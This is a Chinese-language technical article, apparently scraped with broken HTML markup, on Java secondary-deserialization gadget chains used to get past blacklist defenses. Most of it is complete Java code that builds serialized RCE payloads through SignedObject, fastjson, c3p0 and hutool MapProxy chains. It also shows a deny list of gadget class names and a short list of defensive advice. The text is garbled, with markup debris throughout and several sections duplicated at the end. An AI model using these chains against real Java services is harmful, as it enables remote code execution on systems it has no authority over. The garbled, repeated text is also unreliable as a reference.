Java二次反序列化链技术详解<\/h1>

一、二次反序列化概念与原理<\/h2>

1.1 为什么要使用二次反序列化<\/h3>
二次反序列化主要用于绕过黑名单防御机制。当代码通过重写`ObjectInputStream.resolveClass()<\/code>进行黑名单防御时，二次反序列化链所需的类名不在黑名单中，从而产生bypass。<\/p>`

1.2 典型黑名单防御示例<\/h3>
public<\/span> class<\/span> SafeObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> BLACKLIST =<\/span> new<\/span> HashSet<<\/span>String>(<\/span>Arrays.<\/span>asList<\/span>(<\/span>new<\/span> String[]<\/span> {<\/span>
<\/span><\/span>        \/\/"org.apache.commons.beanutils.BeanComparator",
<\/span><\/span><\/span><\/span>        "javax.management.BadAttributeValueExpException"<\/span>,<\/span>
<\/span><\/span>        "org.apache.commons.collections4.map.AbstractHashedMap"<\/span>,<\/span>
<\/span><\/span>        "org.springframework.aop.target.HotSwappableTargetSource"<\/span>,<\/span>
<\/span><\/span>        "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>
<\/span><\/span>    }));<\/span>
<\/span><\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> ClassNotFoundException,<\/span> IOException {<\/span>
<\/span><\/span>        String className =<\/span> desc.<\/span>getName<\/span>();<\/span>
<\/span><\/span>        if<\/span> (<\/span>BLACKLIST.<\/span>contains<\/span>(<\/span>className))<\/span>
<\/span><\/span>            throw<\/span> new<\/span> InvalidClassException(<\/span>"Disallowed deserialization attempt: "<\/span> +<\/span> className);<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>1.3 JEP290与防御绕过<\/h3>
JEP290引入了ObjectInputFilter<\/code>机制：<\/p>
\/\/ 单个ObjectInputStream设置
<\/span><\/span><\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>ObjectInputFilter filter =<\/span> ObjectInputFilter.<\/span>Config<\/span>.<\/span>createFilter<\/span>(<\/span>"!com.sun.org.apache.xalan.internal.xsltc.trax*"<\/span>);<\/span>
<\/span><\/span>ObjectInputFilter.<\/span>Config<\/span>.<\/span>setObjectInputFilter<\/span>(<\/span>ois,<\/span> filter);<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 全局设置（无法通过二次反序列化绕过）
<\/span><\/span><\/span><\/span>System.<\/span>setProperty<\/span>(<\/span>"jdk.serialFilter"<\/span>,<\/span> "!com.sun.org.apache.xalan.internal.xsltc.trax*"<\/span>);<\/span>
<\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>全局设置还可以在java.security<\/code>中写入jdk.serialFilter<\/code>，不同JDK版本文件位置不同：<\/p>

JDK8: jdk1.8.0_181\/jre\/lib\/security\/java.security<\/code><\/li>
JDK11: jdk-11.0.11\/conf\/security\/java.security<\/code><\/li>
<\/ul>
二、协议二次反序列化<\/h2>
2.1 RMI协议<\/h3>

JDK原生链：JRMPClient<\/code>和JRMPListener<\/code><\/li>
需要出网，受JEP290影响<\/li>
版本限制：

8u121-8u231\/8u231-8u241存在JEP290 bypass<\/li>
更高版本无法利用<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 JNDI协议<\/h3>

JDK原生链：JdbcRowSetImpl<\/code>\/LdapAttribute<\/code><\/li>
第三方依赖：SharedPoolDataSource<\/code>\/OracleCachedRowSet<\/code><\/li>
需要出网，通常接在CB\/fastjson\/jackson后面<\/li>
版本限制：

LDAP在JDK20完全无法反序列化<\/li>
RMI一直到JDK22还存在反序列化点<\/li>
<\/ul>
<\/li>
<\/ul>
2.3 JDBC协议<\/h3>

MySQL反序列化<\/li>
8.0.19是最后一个可以反序列化的版本<\/li>
存在不出网反序列化利用方式<\/li>
<\/ul>
三、非协议二次反序列化<\/h2>
3.1 SignedObject.getObject()<\/h3>
最常用的二次反序列化链，漏洞点一目了然，天然适合衔接CB\/fastjson\/jackson。<\/p>
3.1.1 CB+SignedObject示例<\/h4>
\/\/ 构造TemplatesImpl对象
<\/span><\/span><\/span><\/span>FileInputStream inputFromFile =<\/span> new<\/span> FileInputStream(<\/span>"TemplatesImplCalc.class"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bs =<\/span> new<\/span> byte<\/span>[<\/span>inputFromFile.<\/span>available<\/span>()];<\/span>
<\/span><\/span>inputFromFile.<\/span>read<\/span>(<\/span>bs);<\/span>
<\/span><\/span>TemplatesImpl obj =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bs});<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_name"<\/span>,<\/span> "TemplatesImpl"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造PriorityQueue链
<\/span><\/span><\/span><\/span>final<\/span> BeanComparator comparator =<\/span> new<\/span> BeanComparator(<\/span>null<\/span>,<\/span> String.<\/span>CASE_INSENSITIVE_ORDER<\/span>);<\/span>
<\/span><\/span>final<\/span> PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<<\/span>Object>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span> queue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>comparator,<\/span> "property"<\/span>,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>queue,<\/span> "queue"<\/span>,<\/span> new<\/span> Object[]{<\/span>obj,<\/span> obj});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造SignedObject
<\/span><\/span><\/span><\/span>KeyPairGenerator kpg =<\/span> KeyPairGenerator.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>);<\/span>
<\/span><\/span>kpg.<\/span>initialize<\/span>(<\/span>1024<\/span>);<\/span>
<\/span><\/span>KeyPair kp =<\/span> kpg.<\/span>generateKeyPair<\/span>();<\/span>
<\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>queue,<\/span> kp.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造外层PriorityQueue触发链
<\/span><\/span><\/span><\/span>final<\/span> BeanComparator comparator2 =<\/span> new<\/span> BeanComparator(<\/span>null<\/span>,<\/span> String.<\/span>CASE_INSENSITIVE_ORDER<\/span>);<\/span>
<\/span><\/span>final<\/span> PriorityQueue<<\/span>Object><\/span> queue2 =<\/span> new<\/span> PriorityQueue<<\/span>Object>(<\/span>2<\/span>,<\/span> comparator2);<\/span>
<\/span><\/span>queue2.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span> queue2.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>comparator2,<\/span> "property"<\/span>,<\/span> "object"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>queue2,<\/span> "queue"<\/span>,<\/span> new<\/span> Object[]{<\/span>signedObject,<\/span> signedObject});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化并测试
<\/span><\/span><\/span><\/span>ObjectOutputStream oos2 =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>oos2.<\/span>writeObject<\/span>(<\/span>queue2);<\/span>
<\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>3.1.2 fastjson\/jackson中的使用技巧<\/h4>
在fastjson\/jackson链中，不一定要在SignedObject.getObject()<\/code>触发RCE，而是让它返回一个bean，让链继续调这个bean的getter触发RCE：<\/p>
\/\/ 构造TemplatesImpl对象
<\/span><\/span><\/span><\/span>FileInputStream inputFromFile =<\/span> new<\/span> FileInputStream(<\/span>"TemplatesImplCalc.class"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bs =<\/span> new<\/span> byte<\/span>[<\/span>inputFromFile.<\/span>available<\/span>()];<\/span>
<\/span><\/span>inputFromFile.<\/span>read<\/span>(<\/span>bs);<\/span>
<\/span><\/span>TemplatesImpl obj =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bs});<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_name"<\/span>,<\/span> "TemplatesImpl"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造SignedObject
<\/span><\/span><\/span><\/span>KeyPairGenerator kpg =<\/span> KeyPairGenerator.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>);<\/span>
<\/span><\/span>kpg.<\/span>initialize<\/span>(<\/span>1024<\/span>);<\/span>
<\/span><\/span>KeyPair kp =<\/span> kpg.<\/span>generateKeyPair<\/span>();<\/span>
<\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>obj,<\/span> kp.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造fastjson触发链
<\/span><\/span><\/span><\/span>JSONArray jsonArray =<\/span> new<\/span> JSONArray();<\/span>
<\/span><\/span>jsonArray.<\/span>add<\/span>(<\/span>signedObject);<\/span>
<\/span><\/span>BadAttributeValueExpException bd =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>bd,<\/span>"val"<\/span>,<\/span>jsonArray);<\/span>
<\/span><\/span>HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>signedObject,<\/span>bd);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化并测试
<\/span><\/span><\/span><\/span>ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>objectOutputStream.<\/span>writeObject<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>3.2 RMIConnector.connect()<\/h3>
利用链：<\/p>
RMIConnector.connect()
-> RMIConnector.findRMIServerJRMP()
-> RMIConnector.findRMIServer()
-> ObjectInputStream.readObject()
<\/code><\/pre>
由于触发点不是getter，原生反序列化中难用，基本只能接在CC链上。<\/p>
3.3 WrapperConnectionPoolDataSource.setUserOverridesAsString()<\/h3>
依赖c3p0，fastjson中经典链，setter转反序列化。<\/p>
3.3.1 基本利用<\/h4>
InputStream in =<\/span> new<\/span> FileInputStream(<\/span>"1.ser"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> toByteArray(<\/span>in);<\/span>
<\/span><\/span>String payloadHex =<\/span> bytesToHex(<\/span>payload);<\/span>
<\/span><\/span>payloadHex =<\/span> "HexAsciiSerializedMap:"<\/span>+<\/span>payloadHex+<\/span>";"<\/span>;<\/span>
<\/span><\/span>new<\/span> WrapperConnectionPoolDataSource().<\/span>setUserOverridesAsString<\/span>(<\/span>payloadHex);<\/span>
<\/span><\/span><\/code><\/pre>利用链：<\/p>
WrapperConnectionPoolDataSourceBase.setUserOverridesAsString()
-> VetoableChangeSupport.fireVetoableChange()
-> WrapperConnectionPoolDataSource$1.vetoableChange()
-> C3P0ImplUtils.parseUserOverridesAsString()
-> SerializableUtils.fromByteArray()
-> SerializableUtils.deserializeFromByteArray()
-> ObjectInputStream.readObject()
<\/code><\/pre>
3.3.2 结合ObjectFactory<\/h4>
Reference ref =<\/span> new<\/span> Reference(<\/span>"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"<\/span>,<\/span> 
<\/span><\/span>    "com.mchange.v2.naming.JavaBeanObjectFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>InputStream in =<\/span> new<\/span> FileInputStream(<\/span>"1.ser"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> toByteArray(<\/span>in);<\/span>
<\/span><\/span>String payloadHex =<\/span> bytesToHex(<\/span>payload);<\/span>
<\/span><\/span>payloadHex =<\/span> "HexAsciiSerializedMap:"<\/span>+<\/span>payloadHex+<\/span>";"<\/span>;<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"userOverridesAsString"<\/span>,<\/span> payloadHex));<\/span>
<\/span><\/span>
<\/span><\/span>Constructor<?><\/span> constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getDeclaredConstructor<\/span>(<\/span>Reference.<\/span>class<\/span>,<\/span> Name.<\/span>class<\/span>,<\/span> Name.<\/span>class<\/span>,<\/span> Hashtable.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>IndirectlySerialized referenceSerialized =<\/span> (<\/span>IndirectlySerialized)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>ref,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>JndiRefDataSourceBase db =<\/span> new<\/span> JndiRefDataSourceBase(<\/span>true<\/span>);<\/span>
<\/span><\/span>db.<\/span>setJndiName<\/span>(<\/span>referenceSerialized);<\/span>
<\/span><\/span>
<\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"2.ser"<\/span>));<\/span>
<\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>db);<\/span>
<\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"2.ser"<\/span>));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>3.4 JavaBeanObjectFactory.REF_PROPS_KEY<\/h3>
同样是c3p0，利用链：<\/p>
JavaBeanObjectFactory.getObjectInstance()
-> SerializableUtils.fromByteArray()
-> SerializableUtils.deserializeFromByteArray()
-> ObjectInputStream.readObject()
<\/code><\/pre>
示例代码：<\/p>
Reference ref =<\/span> new<\/span> Reference(<\/span>"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"<\/span>,<\/span> 
<\/span><\/span>    "com.mchange.v2.naming.JavaBeanObjectFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>InputStream in =<\/span> new<\/span> FileInputStream(<\/span>"1.ser"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> toByteArray(<\/span>in);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> BinaryRefAddr(<\/span>"com.mchange.v2.naming.JavaBeanReferenceMaker.REF_PROPS_KEY"<\/span>,<\/span> payload));<\/span>
<\/span><\/span>
<\/span><\/span>Constructor<?><\/span> constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getDeclaredConstructor<\/span>(<\/span>Reference.<\/span>class<\/span>,<\/span> Name.<\/span>class<\/span>,<\/span> Name.<\/span>class<\/span>,<\/span> Hashtable.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>IndirectlySerialized referenceSerialized =<\/span> (<\/span>IndirectlySerialized)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>ref,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>JndiRefDataSourceBase db =<\/span> new<\/span> JndiRefDataSourceBase(<\/span>true<\/span>);<\/span>
<\/span><\/span>db.<\/span>setJndiName<\/span>(<\/span>referenceSerialized);<\/span>
<\/span><\/span>
<\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"2.ser"<\/span>));<\/span>
<\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>db);<\/span>
<\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"2.ser"<\/span>));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>3.5 MapProxy.invoke()<\/h3>
依赖hutool，利用链：<\/p>
MapProxy.invoke()
-> Convert.convert()
-> Convert.convertWithCheck()
-> ConverterRegistry.convert()
-> BeanConverter.convert()
-> BeanConverter.convertInternal()
-> ObjectUtil.deserialize()
-> SerializeUtil.deserialize()
-> IoUtil.readObj()
-> ValidateObjectInputStream.readObject()
<\/code><\/pre>
示例代码：<\/p>
\/\/ 构造TemplatesImpl对象
<\/span><\/span><\/span><\/span>FileInputStream inputFromFile =<\/span> new<\/span> FileInputStream(<\/span>"TemplatesImplCalc.class"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bs =<\/span> new<\/span> byte<\/span>[<\/span>inputFromFile.<\/span>available<\/span>()];<\/span>
<\/span><\/span>inputFromFile.<\/span>read<\/span>(<\/span>bs);<\/span>
<\/span><\/span>TemplatesImpl obj =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bs});<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_name"<\/span>,<\/span> "TemplatesImpl"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "_transletIndex"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造PriorityQueue链
<\/span><\/span><\/span><\/span>final<\/span> BeanComparator comparator =<\/span> new<\/span> BeanComparator(<\/span>null<\/span>,<\/span> String.<\/span>CASE_INSENSITIVE_ORDER<\/span>);<\/span>
<\/span><\/span>final<\/span> PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<<\/span>Object>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span> queue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>comparator,<\/span> "property"<\/span>,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>queue,<\/span> "queue"<\/span>,<\/span> new<\/span> Object[]{<\/span>obj,<\/span> obj});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造MapProxy
<\/span><\/span><\/span><\/span>HashMap map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"bounds"<\/span>,<\/span> serialize(<\/span>queue));<\/span>
<\/span><\/span>MapProxy mapProxy =<\/span> MapProxy.<\/span>create<\/span>(<\/span>map);<\/span>
<\/span><\/span>Class proxyClass =<\/span> Shape.<\/span>class<\/span>;<\/span>
<\/span><\/span>Shape proxy =<\/span> (<\/span>Shape)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>proxyClass.<\/span>getClassLoader<\/span>(),<\/span> new<\/span> Class[]<\/span> {<\/span>proxyClass},<\/span> mapProxy);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造外层PriorityQueue触发链
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>comparator,<\/span> "property"<\/span>,<\/span> "bounds"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>queue,<\/span> "queue"<\/span>,<\/span> new<\/span> Object[]{<\/span>proxy,<\/span> proxy});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化并测试
<\/span><\/span><\/span><\/span>ObjectOutputStream oos2 =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>oos2.<\/span>writeObject<\/span>(<\/span>queue);<\/span>
<\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"1.ser"<\/span>));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>四、防御建议<\/h2>

使用全局jdk.serialFilter<\/code>设置<\/li>
避免使用黑名单机制，采用白名单机制<\/li>
及时更新JDK版本<\/li>
对反序列化操作进行严格权限控制<\/li>
避免不可信数据的反序列化操作<\/li>
<\/ol>
五、总结<\/h2>
二次反序列化是绕过黑名单防御的有效手段，理解其原理和各种实现方式对于安全研究和防御都至关重要。在实际应用中，应根据具体环境和需求选择合适的防御策略。<\/p>
Java二次反序列化链技术详解<\/h1>

一、二次反序列化概念与原理<\/h2>

1.1 为什么要使用二次反序列化<\/h3> 二次反序列化主要用于绕过黑名单防御机制。当代码通过重写ObjectInputStream.resolveClass()<\/code>进行黑名单防御时，二次反序列化链所需的类名不在黑名单中，从而产生bypass。<\/p>

二、协议二次反序列化<\/h2>

三、非协议二次反序列化<\/h2>

3.1 SignedObject.getObject()<\/h3> 最常用的二次反序列化链，漏洞点一目了然，天然适合衔接CB\/fastjson\/jackson。<\/p>

3.3 WrapperConnectionPoolDataSource.setUserOverridesAsString()<\/h3> 依赖c3p0，fastjson中经典链，setter转反序列化。<\/p>

五、总结<\/h2> 二次反序列化是绕过黑名单防御的有效手段，理解其原理和各种实现方式对于安全研究和防御都至关重要。在实际应用中，应根据具体环境和需求选择合适的防御策略。<\/p>

1.1 为什么要使用二次反序列化<\/h3>
二次反序列化主要用于绕过黑名单防御机制。当代码通过重写`ObjectInputStream.resolveClass()<\/code>进行黑名单防御时，二次反序列化链所需的类名不在黑名单中，从而产生bypass。<\/p>`

3.1 SignedObject.getObject()<\/h3>
最常用的二次反序列化链，漏洞点一目了然，天然适合衔接CB\/fastjson\/jackson。<\/p>

3.3 WrapperConnectionPoolDataSource.setUserOverridesAsString()<\/h3>
依赖c3p0，fastjson中经典链，setter转反序列化。<\/p>

五、总结<\/h2>
二次反序列化是绕过黑名单防御的有效手段，理解其原理和各种实现方式对于安全研究和防御都至关重要。在实际应用中，应根据具体环境和需求选择合适的防御策略。<\/p>
